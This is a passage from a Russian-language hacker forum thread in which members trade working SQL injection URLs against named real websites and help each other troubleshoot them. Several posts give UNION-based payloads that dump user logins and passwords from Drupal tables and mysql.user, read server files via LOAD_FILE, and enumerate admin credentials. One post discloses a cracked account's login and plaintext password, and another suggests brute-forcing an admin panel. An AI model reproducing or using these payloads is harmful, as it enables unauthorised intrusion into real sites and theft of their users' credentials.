Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Чем то похоже на DES (Unix)....Скорее всего с какого то форума...
     
  2. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    не сказал бы что очень уж похоже не дес, и как понять что с форума ? :D

    походит на base64, а точнее на md5-base64 .. хотя не зватает 4х символов ..
     
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Всё там хватает :) у них по 24, одна из этих :

    MD5(Base64)
    MD4(Base64)
    MD2(Base64)

    Мда (с) :D
     
  4. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    как оно?
    хз не подберается)
    вывода нету чтоли?
    немогу разкуртить =0
     
    #4264 sabe, 27 Dec 2008
    Last edited: 27 Dec 2008
  5. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    http://juggling.tv

    Code:
    http://juggling.tv/vaults/uvideos.php?UID=-1+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,20,21,2,3,4,5,6,7,8,9,30,31,2,3,4,5--
    ____________________________________________

    http://www.astafiev.ru

    Да, без вывода.

    ____________________________________________

    http://www.fortwaynereader.com

    Тут, похоже, нужно указывать группировку по полю
     
    1 person likes this.
  6. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    R1dex juggling.tv
    принтабельных тож нету? )

    не подбор )
     
    #4266 sabe, 27 Dec 2008
    Last edited: 27 Dec 2008
  7. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Ага.

    http://www.legis.krsn.ru/

    Code:
    http://www.legis.krsn.ru/lawsinfo.php?UID=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
     
  8. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    R1dex
    угу.. нужно брутить) там еще и sobranie.info домен )
    http://www.sobranie.info/adm/

    кста стукни;)
     
    #4268 sabe, 27 Dec 2008
    Last edited: 27 Dec 2008
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.mymaika.ru/page.php?id=-120+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
    подобрал, вроде 14. но ошибка
    в чем трабл?
     
    _________________________
  10. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Трабла в том, что это 3-я ветка. В ней нету оператора объединения запросов union.
     
    1 person likes this.
  11. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    2 R1dex , sabe
    http://www.astafiev.ru/topic.php?UID=-119+union+select+111,version()/*
    Есть вывод ;)
     
    1 person likes this.
  12. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Да, тут есть, но конкретно в том случае - нету. ;)
     
    1 person likes this.
  13. Thrasher88

    Thrasher88 Elder - Старейшина

    Joined:
    18 Apr 2008
    Messages:
    62
    Likes Received:
    13
    Reputations:
    0
    В соседней темы выкладывалась скуля
    Почему при
    Вылазит ошибка Fatal error: Call to a member function recordcount() on a non-object in /home/yesoudo/www/channel_detail.php on line 14??
    Пробовал переводить название таблицы в CHAR :(
     
  14. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    потому что таблица находится в другой базе
    Code:
    http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat_ws(0x3a3a,login,pass),3,4,5,6,7,8,9+from+garmenia.drupalusers--
    
    Bonus;)
    доступ к mysql.user:
    Code:
    http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat(user,0x3a,password,0x3a,host,0x3a,file_priv),3,4,5,6,7,8,9+from+mysql.user--
    чтение фалов:
    Code:
    http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,LOAD_FILE(CHAR(47,104,111,109,101,47,121,101,115,111,117,100,111,47,119,119,119,47,99,104,97,110,110,101,108,95,100,101,116,97,105,108,46,112,104,112)),3,4,5,6,7,8,9--
     
    #4274 Iceangel_, 27 Dec 2008
    Last edited: 27 Dec 2008
    9 people like this.
  15. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Подскажите, что за косяк:
    Скуля 4-ка:
    http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14+from+adminrights limit 0,1--
    Перебираю лимитом: 0,1 - выводит - все ОК., ввожу 1,1 - выскакивает ошибка:
    "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY iorder ASC' at line 1"
    Что делаю не так?
     
    #4275 Octave_Parango, 27 Dec 2008
    Last edited: 27 Dec 2008
  16. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Пробовал, до полусотни докрутил.
     
  17. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2Octave_Parango дык мож там тока одна запись?)
     
  18. Thrasher88

    Thrasher88 Elder - Старейшина

    Joined:
    18 Apr 2008
    Messages:
    62
    Likes Received:
    13
    Reputations:
    0
    расшифровал хеш юзера, но почему то не заходит в аккаунт... (
    login 1225532271
    pass arnaud2007
    name michamk

    Странно..
     
  19. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    j0ker13, что-то мне кажется, что так оно и есть.
     
  20. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 Octave_Parango:

    проверь так:

    http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(username,0x3a,password),12,13,14+from+adminrights--
     
Thread Status:
Not open for further replies.